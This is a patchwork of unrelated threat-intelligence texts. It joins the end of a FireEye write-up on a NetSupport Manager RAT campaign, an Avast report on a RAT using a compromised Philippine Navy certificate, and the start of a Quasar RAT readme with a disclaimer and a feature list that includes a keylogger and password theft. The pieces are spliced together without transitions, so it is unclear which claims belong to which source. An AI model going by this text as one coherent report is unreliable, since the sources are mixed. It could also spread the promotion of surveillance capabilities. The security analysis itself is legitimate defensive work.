Figure 10: Artifact Cleaning Commands
The highlighted command in one of the variants indicates that it
might drop or use this file in the attack. The file could be a decoy document.
Persistence Mechanism
During our analysis, we observed two variants of this attack with
different persistence mechanisms.
In the first variant, the malware author uses a RUN registry entry
to remain persistent in the system.
In the second variant, the malware author uses the shortcut file
(named desktop.ini.lnk), which is hosted on the server. It
downloads the shortcut file and places it into the Startup folder, as
shown in Figure 11.
Figure 11: Downloading Shortcut File
The target command for the shortcut file points to the remote
application “client32.exe,” which was dropped in %AppData%, to start
the application on startup.
LogList.rtf
Although the file extension is .rtf, the file is actually a 7zipped
archive. This archive file is password-protected and contains the
NetSupport Manager RAT. The script upd.cmd contains the password to
extract the archive.
The major features provided by the NetSupport tool include:
Remote desktop
File transfer
Remote inventory and system
information
Launching applications in client’s
machine
Geolocation
Downloads.txt
This file contains a list of IP addresses, which could be
compromised systems. It has IPs along with User-agent. The IP
addresses in the file belong to various regions, mostly the U.S.,
Germany, and the Netherlands.
Conclusion
RATs are widely used for legitimate purposes, often by system
administrators. However, since they are legitimate applications and
readily available, malware authors can easily abuse them and sometimes
can avoid user suspicion as well.
The FireEye HX Endpoint platform successfully detects this attack at
the initial phase of the attack cycle.
Acknowledgement
Thanks to my colleagues Dileep Kumar Jallepalli, Rakesh Sharma and
Kimberly Goody for their help in the analysis.
Avast Threat Intelligence Team has found a remote access tool (RAT) actively being used in the wild in the Philippines that uses what appears to be a compromised digital certificate belonging to the Philippine Navy. This certificate is now expired but we see evidence it was in use with this malware in June 2020.
Based on our research, we believe with a high level of confidence that the threat actor had access to the private key belonging to the certificate.
Because this is being used in active attacks now, we are releasing our findings immediately so organizations can take steps to better protect themselves. We have found that this sample is now available on VirusTotal.
Compromised Expired Philippine Navy Digital Certificate
In our analysis we found the sample connects to dost[.]igov-service[.]net:8443 using TLS in a statically linked OpenSSL library.
A WHOIS lookup on the C&C domain gave us the following:
The digital certificate was pinned so that the malware requires the certificate to communicate.
When we checked the digital certificate used for the TLS channel we found the following information:
Some important things to note:
The certificate is a valid certificate with a subject of *.navy.mil.ph, the Philippine Navy.
The certificate has recently expired: it was valid for one year, from Sunday December 15, 2019 until Tuesday December 15, 2020.
Based on our research, we believe with a high level of confidence that the threat actor had access to the private key belonging to the certificate.
While the digital certificate is now expired we see evidence it was in use with this malware in June 2020.
The malicious PE file was found with filename: C:\Windows\System32\wlbsctrl.dll and its hash is: 85FA43C3F84B31FBE34BF078AF5A614612D32282D7B14523610A13944AADAACB.
In analyzing that malicious PE file itself, we found that the compilation timestamp is wrong or was edited. Specifically, the TimeDateStamp of the PE file was modified and set to the year 2004 in both the PE header and Debug Directory as shown below:
However, we found that the author used OpenSSL 1.1.1g and compiled it on April 21, 2020 as shown below:
The username of the author was probably udste. This can be seen in the debug information left inside the used OpenSSL library.
We found that the malware supported the following commands:
run shellcode
read file
write file
cancel data transfer
list drives
rename a file
delete a file
list directory content
Some additional items of note regarding the malicious PE file:
All configuration strings in the malware are encrypted using AES-CBC with the exception of the mutex it uses.That mutex is used as-is without decryption: t7As7y9I6EGwJOQkJz1oRvPUFx1CJTsjzgDlm0CxIa4=.
When this string is decrypted using the hard-coded key it decrypts to QSR_MUTEX_zGKwWAejTD9sDitYcK. We suspect that this is a failed attempt to disguise this malware as the infamous Quasar RAT malware. But this cannot be the case because this sample is written in C++ and the Quasar RAT is written in C#.
Avast customers are protected against this malware.
我(簞純)对您由使用或传播等由此软件引起的任何行为和/或损害不承担任何责任。您对使用此软件的任何行为承担全部责任,并承认此软件仅用于教育和研究目的。下载本软件或软件的源代码,您自动同意上述内容。 I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of the software. You are fully responsible for any use of the software and acknowledge that the software is only used for educational and research purposes. If you download the software or the source code of the software, you will automatically agree with the above content.
Quasar is a fast and light-weight Windows remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring.
It aims to provide high stability and an easy-to-use user interface and is a free, open source tool.
Features of Quasar RAT Windows Remote Administration Tool
The main features that can be found in Quasar are:
TCP network stream (IPv4 & IPv6 support)
Fast network serialization (Protocol Buffers)
Compressed (QuickLZ) & Encrypted (TLS) communication
UPnP Support
Task Manager
File Manager
Startup Manager
Remote Desktop
Remote Shell
Remote Execution
System Information
Registry Editor
System Power Commands (Restart, Shutdown, Standby)
Keylogger (Unicode Support)
Reverse Proxy (SOCKS5)
Password Recovery (Common Browsers and FTP Clients)